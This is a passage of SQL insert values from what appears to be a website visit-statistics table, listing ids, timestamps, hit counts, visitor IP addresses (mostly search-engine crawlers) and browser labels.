66.166',''),(14860,1457270646,1,1,0,0,'178.154.189.204','other'),(14861,1457270900,1,1,0,0,'217.69.133.225','other'),(14862,1457270952,2,2,0,0,'91.196.178.35','chrome'),(14863,1457270966,1,1,0,0,'217.69.143.69','other'),(14864,1457270992,1,0,1,0,'66.249.66.129',''),(14865,1457271269,1,1,0,0,'217.69.143.58','other'),(14866,1457271310,1,1,0,0,'66.249.92.95','other'),(14867,1457271547,1,0,1,0,'68.180.229.232',''),(14868,1457271555,1,1,0,0,'78.111.190.189','chrome'),(14869,1457271839,1,1,0,0,'178.154.189.204','other'),(14870,1457271928,2,2,0,0,'5.255.253.100','other'),(14871,1457271932,2,2,0,0,'5.255.253.9','other'),(14872,1457271937,1,1,0,0,'178.154.149.9','other'),(14873,1457271941,2,2,0,0,'141.8.132.2','other'),(14874,1457271945,1,1,0,0,'130.193.51.55','other'),(14875,1457271953,1,1,0,0,'130.193.51.22','other'),(14876,1457271962,2,2,0,0,'141.8.142.88','other'),(14877,1457271966,1,1,0,0,'93.158.152.9','other'),(14878,1457271970,1,1,0,0,'130.193.51.81','other'),(14879,1457271974,1,1,0,0,'141.8.184.18','other'),(14880,1457271982,2,2,0,0,'141.8.132.76','other'),(14881,1457271986,2,2,0,0,'5.255.253.53','other'),(14882,1457271990,1,1,0,0,'130.193.51.102','other'),(14883,1457271999,2,2,0,0,'141.8.184.11','other'),(14884,1457272003,2,2,0,0,'130.193.37.27','other'),(14885,1457272007,2,2,0,0,'178.154.149.11','other'),(14886,1457272012,2,2,0,0,'141.8.183.14','other'),(14887,1457272019,1,1,0,0,'141.8.132.99','other'),(14888,1457272027,2,2,0,0,'130.193.51.45','other'),(14889,1457272497,1,1,0,0,'130.193.51.43','other'),(14890,1457272513,1,1,0,0,'141.8.132.97','other'),(14891,1457272521,1,0,1,0,'68.180.229.232',''),(14892,1457272522,1,1,0,0,'5.255.253.110','other'),(14893,1457272530,1,1,0,0,'5.255.253.30','other'),(14894,1457272535,1,1,0,0,'5.255.253.55','other'),(14895,1457272542,1,1,0,0,'141.8.132.79','other'),(14896,1457272550,1,1,0,0,'141.8.142.8','other'),(14897,1457272585,2,0,2,0,'66.249.66.162',''),(14898,1457272650,2,2,0,0,'66.249.66.162','other'),(14899,1457272668,3,3,0,0,'66.249.66.190','other'),(14900,1457272739,2,2,0,0,'66.249.66.133','other'),(14901,1457272856,1,0,1,0,'66.249.66.158',''),(14902,1457273009,1,1,0,0,'91.196.178.134','chrome'),(14903,1457273459,1,1,0,0,'217.69.143.69','other'),(14904,1457274031,1,0,1,0,'68.180.229.232',''),(14905,1457274336,2,2,0,0,'5.255.253.100','other'),(14906,1457274340,2,2,0,0,'130.193.51.43','other'),(14907,1457274344,1,1,0,0,'5.255.253.10','other'),(14908,1457274348,1,1,0,0,'141.8.142.10','other'),(14909,1457274353,1,1,0,0,'5.255.253.9','other'),(14910,1457274360,1,1,0,0,'141.8.132.97','other'),(14911,1457274364,2,2,0,0,'130.193.51.102','other'),(14912,1457274368,1,1,0,0,'141.8.142.88','other'),(14913,1457274372,1,1,0,0,'5.255.253.55','other'),(14914,1457274376,1,1,0,0,'130.193.37.27','other'),(14915,1457274380,2,2,0,0,'141.8.142.8','other'),(14916,1457274385,1,1,0,0,'5.255.253.53','other'),(14917,1457274397,1,1,0,0,'141.8.184.11','other'),(14918,1457274401,1,1,0,0,'130.193.51.81','other'),(14919,1457274413,1,1,0,0,'141.8.132.79','other'),(14920,1457274421,1,1,0,0,'93.158.152.9','other'),(14921,1457274425,1,1,0,0,'141.8.132.99','other'),(14922,1457274433,1,1,0,0,'93.158.152.26','other'),(14923,1457274525,3,1,2,0,'66.249.66.158',''),(14924,1457274561,2,1,1,0,'66.249.66.162',''),(14925,1457274632,1,1,0,0,'8.29.198.26','other'),(14926,1457274736,1,1,0,0,'207.46.13.106','other'),(14927,1457275083,1,1,0,0,'176.108.142.105','firefox'),(14928,1457275112,1,1,0,0,'217.69.143.61','other'),(14929,1457275241,1,0,1,0,'68.180.229.232',''),(14930,1457275247,3,1,2,0,'66.249.66.158',''),(14931,1457275434,1,1,0,0,'217.69.133.216','other'),(14932,1457275451,1,0,1,0,'66.249.66.166',''),(14933,1457275493,1,0,1,0,'66.249.66.162',''),(14934,1457276462,6,6,0,0,'178.154.149.11','other'),(14935,1457276471,1,1,0,0,'141.8.132.97','other'),(14936,1457276475,1,1,0,0,'5.255.253.110','other'),(14937,1457276478,1,0,1,0,'66.249.66.162',''),(14938,1457276479,2,2,0,0,'5.255.253.30','other'),(14939,1457276483,2,2,0,0,'141.8.132.79','other'),(14940,1457276487,3,3,0,0,'141.8.142.41','other'),(14941,1457276491,1,1,0,0,'130.193.51.85','other'),(14942,1457276495,1,1,0,0,'141.8.142.8','other'),(14943,1457276503,3,3,0,0,'141.8.183.14','other'),(14944,1457276507,2,2,0,0,'93.158.152.9','other'),(14945,1457276511,3,3,0,0,'5.255.253.53','other'),(14946,1457276515,2,2,0,0,'130.193.37.21','other'),(14947,1457276519,4,4,0,0,'5.255.253.100','other'),(14948,1457276524,3,3,0,0,'130.193.51.45','other'),(14949,1457276527,2,2,0,0,'5.255.253.10','other'),(14950,1457276531,1,1,0,0,'93.158.152.26','other'),(14951,1457276535,2,2,0,0,'141.8.184.11','other'),(14952,1457276543,2,2,0,0,'130.193.51.102','other'),(14953,1457276551,2,2,0,0,'141.8.132.76','other'),(14954,1457276563,3,3,0,0,'141.8.184.18','other'),(14955,1457276564,1,1,0,0,'217.69.143.63','other'),(14956,1457276601,2,2,0,0,'130.193.51.81','other'),(14957,1457276604,1,1,0,0,'5.255.253.55','other'),(14958,1457276617,1,1,0,0,'5.255.253.9','other'),(14959,1457276621,1,1,0,0,'141.8.142.88','other'),(14960,1457276625,1,1,0,0,'130.193.37.27','other'),(14961,1457276641,1,1,0,0,'141.8.132.2','other'),(14962,1457276681,1,1,0,0,'217.69.143.52','other'),(14963,1457276682,1,0,1,0,'68.180.229.232',''),(14964,1457276687,1,1,0,0,'141.8.132.99','other'),(14965,1457276705,1,1,0,0,'217.69.133.239','other'),(14966,1457276773,1,1,0,0,'178.154.189.204','other'),(14967,1457276835,1,1,0,0,'217.69.136.203','other'),(14968,1457276920,1,1,0,0,'51.255.65.26','other'),(14969,1457277061,1,0,1,0,'66.249.66.190',''),(14970,1457277069,1,0,1,0,'66.249.66.129',''),(14971,1457277313,1,1,0,0,'217.69.136.208','other'),(14972,1457277407,2,0,2,0,'66.249.66.158',''),(14973,1457277431,2,0,2,0,'66.249.66.162',''),(14974,1457277518,1,1,0,0,'157.55.39.211','other'),(14975,1457278154,3,0,3,0,'66.249.66.166',''),(14976,1457278499,1,0,1,0,'66.249.66.129',''),(14977,1457278525,2,0,2,0,'66.249.66.158',''),(14978,1457278671,2,0,2,0,'66.249.66.162',''),(14979,1457278865,1,1,0,0,'130.193.37.27','other'),(14980,1457278866,1,1,0,0,'141.8.183.14','other'),(14981,1457278867,1,1,0,0,'130.193.37.21','other'),(14982,1457278868,1,1,0,0,'93.158.152.26','other'),(14983,1457278869,1,1,0,0,'5.255.253.9','other'),(14985,1457278870,1,1,0,0,'141.8.142.88','other'),(14986,1457278871,1,1,0,0,'5.255.253.30','other'),(14987,1457278872,1,1,0,0,'141.8.132.79','other'),(14989,1457278873,1,1,0,0,'178.154.149.11','other'),(14990,1457278874,1,1,0,0,'5.255.253.53','other'),(14991,1457279226,1,1,0,0,'217.69.143.60','other'),(14992,1457279500,1,1,0,0,'157.55.39.211','other'),(14993,1457279901,1,1,0,0,'66.249.66.158','other'),(14994,1457280131,1,1,0,0,'62.149.0.171','other'),(14995,1457280436,1,1,0,0,'217.69.133.227','other'),(14996,1457280437,1,1,0,0,'217.69.133.231','other'),(14997,1457280607,1,1,0,0,'217.69.133.85','other'),(14998,1457280766,1,1,0,0,'217.69.133.70','other'),(14999,1457281011,1,0,1,0,'66.249.66.162',''),(15000,1457281036,1,0,1,0,'66.249.66.190',''),(15001,1457281039,2,0,2,0,'68.180.229.232',''),(15002,1457281046,2,0,2,0,'66.249.66.129',''),(15003,1457281057,2,0,2,0,'66.249.66.158',''),(15004,1457281892,3,0,3,0,'66.249.66.166',''),(15005,1457282081,2,0,2,0,'66.249.66.158',''),(15006,1457282154,1,1,0,0,'78.111.190.189','chrome'),(15007,1457282423,1,1,0,0,'217.69.143.53','other'),(15008,1457282480,1,1,0,0,'66.249.92.99','other'),(15009,1457282607,3,1,2,0,'66.249.66.158',''),(15010,1457282635,1,1,0,0,'217.69.133.69','other'),(15011,1457282658,1,1,0,0,'80.91.162.99','other'),(15012,1457282660,1,1,0,0,'141.8.184.18','other'),(15014,1457282661,1,1,0,0,'141.8.183.14','other'),(15016,1457282662,1,1,0,0,'130.193.37.21','other'),(15017,1457282663,1,1,0,0,'141.8.132.99','other'),(15019,1457282664,1,1,0,0,'141.8.132.2','other'),(15020,1457282665,1,1,0,0,'141.8.184.11','other'),(15021,1457282666,1,1,0,0,'141.8.142.10','other'),(15022,1457282668,1,1,0,0,'130.193.51.81','other'),(15023,1457282669,1,1,0,0,'141.8.184.22','other'),(15024,1457282670,1,1,0,0,'130.193.51.102','other'),(15025,1457282686,2,0,2,0,'66.249.66.162',''),(15026,1457283418,1,1,0,0,'217.69.133.232','other'),(15027,1457283852,2,0,2,0,'68.180.229.232',''),(15028,1457284354,18,0,18,0,'66.249.66.158',''),(15029,1457284378,1,0,1,0,'66.249.66.162',''),(15030,1457284401,1,1,0,0,'217.69.133.233','other'),(15032,1457284685,1,0,1,0,'66.249.66.166',''),(15033,1457284697,1,1,0,0,'217.69.133.218','other'),(15034,1457284800,4,0,4,0,'66.249.66.129',''),(15035,1457284881,1,0,1,0,'66.249.66.133',''),(15036,1457285291,1,1,0,0,'91.124.182.203','firefox'),(15037,1457285364,1,0,1,0,'66.249.66.158',''),(15038,1457285385,3,1,2,0,'66.249.66.158',''),(15039,1457285488,1,1,0,0,'8.29.198.25','other'),(15040,1457286048,1,1,0,0,'217.69.143.62','other'),(15041,1457286054,3,0,3,0,'66.249.66.166',''),(15042,1457286209,1,1,0,0,'40.77.167.86','other'),(15043,1457286401,1,1,0,0,'217.69.133.216','other'),(15044,1457286590,1,0,1,0,'68.180.229.232',''),(15045,1457286995,1,1,0,0,'93.158.152.26','other'),(15047,1457286996,1,1,0,0,'141.8.142.10','other'),(15048,1457286997,1,1,0,0,'130.193.51.81','other'),(15049,1457287019,4,0,4,0,'66.249.66.166',''),(15050,1457287082,1,1,0,0,'217.69.143.69','other'),(15051,1457287393,2,0,2,0,'66.249.66.158',''),(15052,1457287622,1,1,0,0,'157.55.39.137','other'),(15053,1457287627,1,1,0,0,'51.255.65.48','other'),(15054,1457287795,1,0,1,0,'66.249.66.190',''),(15055,1457287930,1,1,0,0,'217.69.133.230','other'),(15056,1457287931,1,1,0,0,'217.69.133.232','other'),(15057,1457288068,1,1,0,0,'217.69.136.210','other'),(15058,1457288572,1,1,0,0,'217.69.133.222','other'),(15059,1457288666,1,1,0,0,'91.196.178.164','chrome'),(15060,1457288690,1,0,1,0,'66.249.66.158',''),(15061,1457288723,2,0,2,0,'66.249.66.190',''),(15062,1457289175,2,0,2,0,'66.249.66.162',''),(15063,1457289395,1,1,0,0,'157.55.39.211','other'),(15064,1457289462,3,0,3,0,'66.249.66.166',''),(15065,1457289524,1,1,0,0,'217.69.143.50','other'),(15066,1457290521,3,0,3,0,'66.249.66.166',''),(15067,1457290619,1,1,0,0,'130.193.51.43','other'),(15068,1457290623,1,1,0,0,'141.8.132.2','other'),(15070,1457290624,2,2,0,0,'141.8.132.97','other'),(15072,1457291150,2,1,1,0,'66.249.66.158',''),(15073,1457291652,1,1,0,0,'217.69.143.65','other'),(15074,1457291700,1,1,0,0,'78.111.186.171','chrome'),(15075,1457291778,2,0,2,0,'66.249.66.162',''),(15076,1457291787,1,1,0,0,'217.69.133.215','other'),(15077,1457291788,1,1,0,0,'217.69.133.219','other'),(15078,1457292254,1,1,0,0,'178.92.77.17','chrome'),(15079,1457292360,1,0,1,0,'66.249.66.133',''),(15080,1457292386,1,1,0,0,'66.249.66.190','other'),(15081,1457292418,1,0,1,0,'66.249.66.158',''),(15082,1457292632,1,0,1,0,'66.249.66.166',''),(15083,1457292882,1,1,0,0,'141.8.142.41','other'),(15084,1457292963,2,1,1,0,'66.249.66.166',''),(15085,1457293126,1,1,0,0,'157.55.39.211','other'),(15086,1457293149,1,1,0,0,'207.241.229.31','other'),(15087,1457293195,1,0,1,0,'68.180.229.232',''),(15088,1457293361,1,1,0,0,'66.249.92.99','other'),(15089,1457293405,1,1,0,0,'141.8.183.14','other'),(15090,1457293531,1,1,0,0,'91.196.178.164','chrome'),(15091,1457293733,1,0,1,0,'66.249.66.162',''),(15092,1457294030,1,1,0,0,'40.77.167.86','other'),(15093,1457294158,4,0,4,0,'66.249.66.166',''),(15094,1457294497,1,1,0,0,'157.55.39.211','other'),(15095,1457294539,1,1,0,0,'217.69.136.207','other'),(15096,1457294540,2,2,0,0,'217.69.136.206','other'),(15097,1457294680,1,0,1,0,'66.249.66.162',''),(15098,1457294719,1,1,0,0,'217.69.133.230','other'),(15099,1457294781,1,1,0,0,'141.8.132.44','other'),(15100,1457294845,1,1,0,0,'91.196.178.36','chrome'),(15101,1457294910,1,1,0,0,'141.8.132.79','other'),(15102,1457294991,2,0,2,0,'68.180.229.232',''),(15103,1457295038,1,1,0,0,'78.111.190.189','chrome'),(15104,1457295173,3,0,3,0,'66.249.66.158',''),(15105,1457295380,3,1,2,0,'66.249.66.162',''),(15106,1457295496,2,2,0,0,'141.8.132.66','other'),(15107,1457295806,8,8,0,0,'141.8.142.88','other'),(15108,1457295848,4,4,0,0,'5.255.253.17','other'),(15109,1457295851,4,4,0,0,'141.8.132.97','other'),(15110,1457295852,1,1,0,0,'141.8.132.76','other'),(15111,1457295854,6,6,0,0,'141.8.184.18','other'),(15112,1457295855,4,4,0,0,'130.193.37.21','other'),(15113,1457295856,4,4,0,0,'5.255.253.9','other'),(15114,1457295858,5,5,0,0,'5.255.253.94','other'),(15115,1457295859,3,3,0,0,'178.154.149.11','other'),(15116,1457295867,1,1,0,0,'217.69.143.64','other'),(15117,1457295881,4,4,0,0,'130.193.50.22','other'),(15118,1457295883,4,4,0,0,'141.8.132.2','other'),(15119,1457295884,2,2,0,0,'178.154.189.6','other'),(15120,1457295900,1,1,0,0,'93.158.152.81','other'),(15122,1457295911,4,4,0,0,'141.8.132.99','other'),(15123,1457295914,2,2,0,0,'5.255.253.30','other'),(15124,1457295928,5,5,0,0,'141.8.142.8','other'),(15125,1457295960,1,1,0,0,'141.8.142.60','other'),(15126,1457295965,1,1,0,0,'141.8.183.14','other'),(15127,1457295996,4,4,0,0,'130.193.51.45','other'),(15128,1457296000,4,4,0,0,'93.158.152.26','other'),(15129,1457296001,3,3,0,0,'141.8.142.55','other'),(15130,1457296011,5,5,0,0,'93.158.152.65','other'),(15131,1457296012,4,4,0,0,'130.193.51.50','other'),(15132,1457296013,5,5,0,0,'93.158.152.9','other'),(15133,1457296043,4,4,0,0,'130.193.51.81','other'),(15134,1457296101,3,0,3,0,'66.249.66.166',''),(15135,1457296370,1,1,0,0,'8.29.198.26','other'),(15136,1457296430,3,3,0,0,'141.8.132.44','other'),(15137,1457296431,3,3,0,0,'130.193.51.109','other'),(15138,1457296434,3,3,0,0,'141.8.184.11','other'),(15139,1457296445,5,5,0,0,'141.8.132.79','other'),(15140,1457296446,1,1,0,0,'178.154.149.9','other'),(15141,1457296453,2,2,0,0,'5.255.253.55','other'),(15142,1457296462,1,1,0,0,'40.77.167.86','other'),(15143,1457296520,2,2,0,0,'130.193.37.27','other'),(15144,1457296537,3,3,0,0,'5.255.253.53','other'),(15145,1457296550,1,1,0,0,'141.8.142.82','other'),(15146,1457296554,1,1,0,0,'5.255.253.62','other'),(15147,1457296606,1,1,0,0,'141.8.132.66','other'),(15148,1457296650,1,1,0,0,'141.8.184.6','other'),(15149,1457296687,2,2,0,0,'130.193.51.43','other'),(15150,1457296693,2,2,0,0,'5.255.253.110','other'),(15151,1457296722,2,2,0,0,'130.193.51.85','other'),(15152,1457296731,1,1,0,0,'5.255.253.10','other'),(15153,1457296795,1,1,0,0,'141.8.184.22','other'),(15154,1457296877,4,4,0,0,'141.8.132.2','other'),(15155,1457296878,4,4,0,0,'141.8.132.97','other'),(15156,1457296879,2,2,0,0,'5.255.253.30','other'),(15157,1457296882,1,1,0,0,'93.158.152.81','other'),(15158,1457296883,2,2,0,0,'141.8.183.14','other'),(15160,1457296884,1,1,0,0,'141.8.132.99','other'),(15161,1457296886,4,4,0,0,'5.255.253.9','other'),(15162,1457296888,3,3,0,0,'141.8.142.88','other'),(15163,1457296889,3,3,0,0,'141.8.132.76','other'),(15164,1457296890,3,3,0,0,'141.8.142.41','other'),(15165,1457296892,1,1,0,0,'130.193.37.21','other'),(15166,1457296893,3,3,0,0,'5.255.253.100','other'),(15167,1457296898,2,2,0,0,'141.8.184.18','other'),(15168,1457296899,1,1,0,0,'178.154.149.11','other'),(15169,1457296911,2,2,0,0,'130.193.51.102','other'),(15171,1457297306,2,0,2,0,'66.249.66.129',''),(15172,1457297324,2,2,0,0,'66.249.66.158','other'),(15173,1457297475,1,1,0,0,'217.69.133.227','other'),(15174,1457297491,1,1,0,0,'141.8.132.79','other'),(15175,1457297526,1,1,0,0,'141.8.142.82','other'),(15176,1457297527,3,0,3,0,'66.249.66.162',''),(15177,1457297555,1,1,0,0,'5.255.253.94','other'),(15178,1457297556,1,1,0,0,'5.255.253.89','other'),(15179,1457297580,1,1,0,0,'178.154.189.6','other'),(15180,1457297613,1,1,0,0,'141.8.132.66','other'),(15181,1457297619,2,2,0,0,'141.8.184.11','other'),(15182,1457297640,2,2,0,0,'141.8.142.55','other'),(15183,1457297765,1,0,1,0,'66.249.66.190',''),(15184,1457298083,1,1,0,0,'217.69.143.48','other'),(15185,1457298157,1,1,0,0,'217.69.133.231','other'),(15186,1457298158,1,1,0,0,'217.69.133.233','other'),(15187,1457298194,1,1,0,0,'66.249.66.166','other'),(15188,1457298327,2,2,0,0,'217.69.143.64','other'),(15189,1457298337,1,1,0,0,'130.193.51.109','other'),(15191,1457298340,3,3,0,0,'5.255.253.53','other'),(15193,1457298341,1,1,0,0,'5.255.253.9','other'),(15194,1457298342,2,2,0,0,'130.193.51.102','other'),(15196,1457298347,1,1,0,0,'130.193.50.22','other'),(15198,1457298348,1,1,0,0,'93.158.152.9','other'),(15200,1457298350,1,1,0,0,'93.158.152.26','other'),(15201,1457298351,1,1,0,0,'141.8.184.6','other'),(15202,1457298364,1,1,0,0,'217.69.133.239','other'),(15203,1457298550,1,1,0,0,'207.46.13.171','other'),(15204,1457298762,2,2,0,0,'217.69.133.70','other'),(15205,1457298763,1,1,0,0,'217.69.133.238','other'),(15206,1457298902,1,1,0,0,'141.8.132.76','other'),(15207,1457298905,2,2,0,0,'130.193.51.43','other'),(15208,1457298906,1,1,0,0,'141.8.142.10','other'),(15210,1457298908,1,1,0,0,'130.193.37.27','other'),(15211,1457298909,1,1,0,0,'178.154.149.11','other'),(15212,1457298911,1,1,0,0,'141.8.184.11','other'),(15213,1457298912,1,1,0,0,'141.8.132.97','other'),(15215,1457298913,1,1,0,0,'5.255.253.30','other'),(15216,1457298914,1,1,0,0,'141.8.142.41','other'),(15217,1457298985,1,1,0,0,'91.200.12.143','firefox'),(15218,1457299014,1,0,1,0,'66.249.66.158',''),(15219,1457299162,3,1,2,0,'66.249.66.166',''),(15220,1457299195,1,1,0,0,'217.69.133.229','other'),(15221,1457299198,1,1,0,0,'66.249.66.133','other'),(15222,1457299199,1,1,0,0,'157.55.39.223','other'),(15223,1457299418,1,1,0,0,'217.69.136.203','other'),(15224,1457299419,1,1,0,0,'217.69.136.207','other'),(15225,1457299594,1,1,0,0,'66.249.66.158','other'),(15226,1457299877,1,1,0,0,'91.200.12.143','chrome'),(15227,1457300062,2,1,1,0,'66.249.66.166',''),(15228,1457300386,1,1,0,0,'66.249.66.162','other'),(15229,1457300412,1,1,0,0,'141.8.184.18','other'),(15230,1457300413,1,1,0,0,'178.154.149.11','other'),(15231,1457301410,1,1,0,0,'40.77.167.86','other'),(15232,1457301423,1,1,0,0,'40.77.167.27','other'),(15233,1457301529,1,0,1,0,'66.249.66.166',''),(15234,1457301649,2,2,0,0,'66.249.66.162','other'),(15236,1457301822,1,1,0,0,'37.9.122.203','other'),(15237,1457301826,1,1,0,0,'178.154.189.204','other'),(15238,1457302021,1,0,1,0,'68.180.229.232',''),(15239,1457302370,1,1,0,0,'217.69.136.207','other'),(15240,1457302462,1,1,0,0,'130.193.51.55','other'),(15242,1457302463,2,2,0,0,'5.255.253.9','other'),(15243,1457302464,2,2,0,0,'5.255.253.30','other'),(15244,1457302465,1,1,0,0,'141.8.142.8','other'),(15245,1457302466,2,2,0,0,'5.255.253.94','other'),(15246,1457302468,1,1,0,0,'141.8.132.109','other'),(15249,1457302469,2,2,0,0,'141.8.132.66','other'),(15250,1457302470,1,1,0,0,'141.8.132.2','other'),(15251,1457302472,1,1,0,0,'141.8.142.41','other'),(15252,1457302475,1,1,0,0,'130.193.51.22','other'),(15254,1457302476,1,1,0,0,'141.8.142.82','other'),(15255,1457302477,1,1,0,0,'93.158.152.81','other'),(15256,1457302479,1,1,0,0,'130.193.51.91','other'),(15257,1457302488,1,1,0,0,'130.193.51.85','other'),(15258,1457302489,1,1,0,0,'178.154.149.11','other'),(15260,1457302803,1,1,0,0,'66.249.66.166','other'),(15261,1457303165,2,2,0,0,'217.69.133.215','other'),(15262,1457303495,1,1,0,0,'207.46.13.171','other'),(15263,1457303615,1,1,0,0,'213.111.233.25','firefox'),(15264,1457303848,1,0,1,0,'66.249.66.158',''),(15265,1457304150,1,1,0,0,'66.249.92.95','other'),(15266,1457304360,1,0,1,0,'66.249.66.166',''),(15267,1457304377,1,0,1,0,'66.249.66.162',''),(15268,1457304612,1,1,0,0,'62.210.215.100','chrome'),(15269,1457304736,1,1,0,0,'217.69.133.69','other'),(15270,1457304810,1,1,0,0,'217.69.133.5','other'),(15271,1457304993,1,1,0,0,'180.76.15.19','other'),(15272,1457305067,1,1,0,0,'217.69.136.204','other'),(15273,1457305069,1,1,0,0,'217.69.136.203','other'),(15274,1457305122,1,0,1,0,'66.249.66.158',''),(15275,1457305207,2,2,0,0,'141.8.132.2','other'),(15276,1457305209,1,1,0,0,'141.8.132.76','other'),(15278,1457305210,1,1,0,0,'178.154.149.11','other'),(15279,1457305211,1,1,0,0,'5.255.253.53','other'),(15280,1457305212,1,1,0,0,'130.193.51.45','other'),(15281,1457305214,1,1,0,0,'130.193.51.81','other'),(15282,1457305215,1,1,0,0,'130.193.51.102','other'),(15283,1457305216,1,1,0,0,'5.255.253.55','other'),(15284,1457305571,1,1,0,0,'66.249.66.166','other'),(15285,1457305609,1,1,0,0,'217.69.133.221','other'),(15286,1457305689,1,1,0,0,'51.255.65.69','other'),(15287,1457306072,2,2,0,0,'178.154.189.204','other'),(15288,1457306131,1,1,0,0,'217.69.133.227','other'),(15289,1457306196,1,0,1,0,'66.249.66.190',''),(15290,1457306303,1,0,1,0,'66.249.66.162',''),(15291,1457306671,1,1,0,0,'40.77.167.27','other'),(15292,1457306682,1,0,1,0,'68.180.229.232',''),(15293,1457306900,1,1,0,0,'217.69.143.62','other'),(15294,1457307213,1,1,0,0,'8.29.198.25','other'),(15295,1457307431,1,1,0,0,'130.193.37.27','other'),(15296,1457307476,2,2,0,0,'207.46.13.171','other'),(15297,1457307526,1,1,0,0,'217.69.133.218','other'),(15298,1457307527,1,1,0,0,'217.69.133.84','other'),(15299,1457307528,1,1,0,0,'217.69.133.219','other'),(15300,1457307592,1,0,1,0,'68.180.229.232',''),(15301,1457308135,1,1,0,0,'217.69.143.58','other'),(15302,1457308136,1,1,0,0,'217.69.143.59','other'),(15303,1457308176,1,1,0,0,'141.8.184.22','other'),(15304,1457308179,1,1,0,0,'93.158.152.26','other'),(15305,1457308412,2,0,2,0,'66.249.66.162',''),(15306,1457308791,1,1,0,0,'217.69.133.233','other'),(15307,1457308832,1,0,1,0,'68.180.229.232',''),(15308,1457309014,4,4,0,0,'5.255.253.9','other'),(15309,1457309382,4,4,0,0,'5.255.253.10','other'),(15310,1457309384,5,5,0,0,'5.255.253.55','other'),(15311,1457309385,3,3,0,0,'178.154.149.11','other'),(15312,1457309386,4,4,0,0,'130.193.51.43','other'),(15313,1457309388,4,4,0,0,'130.193.51.102','other'),(15314,1457309401,2,2,0,0,'5.255.253.100','other'),(15316,1457309417,4,4,0,0,'141.8.184.18','other'),(15318,1457309420,1,1,0,0,'141.8.184.22','other'),(15319,1457309422,1,1,0,0,'130.193.51.85','other'),(15320,1457309423,3,3,0,0,'141.8.132.99','other'),(15321,1457309454,3,3,0,0,'5.255.253.110','other'),(15322,1457309455,2,2,0,0,'141.8.142.41','other'),(15323,1457309456,3,3,0,0,'130.193.51.45','other'),(15324,1457309570,1,1,0,0,'217.69.143.63','other'),(15325,1457309657,3,3,0,0,'130.193.51.81','other'),(15326,1457309673,4,4,0,0,'141.8.142.88','other'),(15328,1457309674,2,2,0,0,'93.158.152.9','other'),(15329,1457309676,3,3,0,0,'141.8.142.10','other'),(15330,1457309678,3,3,0,0,'130.193.37.27','other'),(15331,1457309687,2,2,0,0,'141.8.132.97','other'),(15332,1457309688,1,1,0,0,'5.255.253.30','other'),(15333,1457309689,1,1,0,0,'141.8.183.14','other'),(15334,1457309692,1,1,0,0,'130.193.37.21','other'),(15335,1457309693,2,2,0,0,'141.8.132.2','other'),(15336,1457309696,2,2,0,0,'141.8.132.79','other'),(15337,1457309697,1,1,0,0,'217.69.133.70','other'),(15338,1457309699,1,1,0,0,'141.8.132.109','other'),(15339,1457309701,2,2,0,0,'141.8.132.76','other'),(15340,1457309702,2,2,0,0,'141.8.142.8','other'),(15341,1457309709,1,1,0,0,'93.158.152.26','other'),(15342,1457309710,1,1,0,0,'141.8.184.11','other'),(15343,1457309738,1,1,0,0,'40.77.167.86','other'),(15344,1457309979,2,0,2,0,'66.249.66.158',''),(15345,1457310119,2,0,2,0,'66.249.66.162',''),(15346,1457310209,3,0,3,0,'66.249.66.166',''),(15347,1457310442,1,1,0,0,'217.69.133.240','other'),(15348,1457311672,1,1,0,0,'141.8.183.14','other'),(15349,1457311676,1,1,0,0,'93.158.152.9','other'),(15350,1457311680,1,1,0,0,'5.255.253.53','other'),(15351,1457311688,2,2,0,0,'130.193.51.45','other'),(15352,1457311693,1,1,0,0,'130.193.51.43','other'),(15353,1457311697,1,1,0,0,'141.8.132.2','other'),(15354,1457311701,1,1,0,0,'5.255.253.10','other'),(15355,1457311705,1,1,0,0,'141.8.184.11','other'),(15356,1457311995,1,1,0,0,'217.69.133.237','other'),(15357,1457311996,1,1,0,0,'217.69.133.234','other'),(15358,1457312172,1,1,0,0,'217.69.133.69','other'),(15359,1457312339,1,0,1,0,'66.249.66.158',''),(15360,1457312340,1,1,0,0,'141.8.142.88','other'),(15361,1457312345,1,1,0,0,'141.8.132.76','other'),(15362,1457312349,1,1,0,0,'141.8.142.41','other'),(15363,1457312353,1,1,0,0,'141.8.142.8','other'),(15364,1457312361,1,1,0,0,'130.193.37.21','other'),(15365,1457312369,1,1,0,0,'141.8.132.97','other'),(15366,1457312374,1,1,0,0,'178.154.149.11','other'),(15367,1457312938,1,1,0,0,'180.76.15.161','other'),(15368,1457313067,1,1,0,0,'40.77.167.86','other'),(15369,1457313269,1,1,0,0,'217.69.133.216','other'),(15370,1457313712,1,1,0,0,'51.255.65.84','other'),(15371,1457313720,1,1,0,0,'141.8.184.11','other'),(15372,1457313725,1,1,0,0,'141.8.132.76','other'),(15373,1457313729,1,1,0,0,'5.255.253.100','other'),(15374,1457313777,1,0,1,0,'68.180.229.232',''),(15375,1457314078,1,0,1,0,'66.249.66.158',''),(15376,1457314119,2,0,2,0,'66.249.66.162',''),(15377,1457314200,1,1,0,0,'40.77.167.27','other'),(15378,1457314764,1,1,0,0,'51.255.65.61','other'),(15379,1457314802,3,1,2,0,'66.249.66.166',''),(15380,1457314890,1,1,0,0,'217.69.133.218','other'),(15381,1457314940,1,1,0,0,'66.249.92.99','other'),(15382,1457315038,1,1,0,0,'207.241.229.31','other'),(15383,1457315204,1,0,1,0,'66.249.66.129',''),(15384,1457315491,1,0,1,0,'66.249.66.158',''),(15385,1457315838,1,0,1,0,'68.180.229.232',''),(15386,1457316303,1,1,0,0,'217.69.143.44','other'),(15387,1457316318,1,1,0,0,'217.69.133.240','other'),(15388,1457316329,1,0,1,0,'66.249.66.166',''),(15389,1457316371,3,3,0,0,'130.193.37.27','other'),(15390,1457316375,1,1,0,0,'130.193.51.102','other'),(15391,1457316383,1,1,0,0,'93.158.152.26','other'),(15392,1457316388,1,1,0,0,'130.193.51.43','other'),(15393,1457316392,1,1,0,0,'141.8.132.99','other'),(15394,1457316396,1,1,0,0,'178.154.149.11','other'),(15395,1457316404,2,2,0,0,'5.255.253.55','other'),(15396,1457316409,2,2,0,0,'5.255.253.110','other'),(15397,1457316413,1,1,0,0,'141.8.184.11','other'),(15398,1457316417,1,1,0,0,'141.8.132.76','other'),(15399,1457316422,1,1,0,0,'141.8.132.79','other'),(15400,1457316426,2,2,0,0,'130.193.51.81','other'),(15401,1457316430,1,1,0,0,'130.193.51.45','other'),(15402,1457316434,1,1,0,0,'141.8.184.18','other'),(15403,1457316445,1,1,0,0,'5.255.253.53','other'),(15404,1457316449,2,2,0,0,'141.8.142.8','other'),(15405,1457316462,1,1,0,0,'93.158.152.9','other'),(15406,1457316470,1,1,0,0,'5.255.253.9','other'),(15407,1457316536,1,1,0,0,'217.69.136.205','other'),(15408,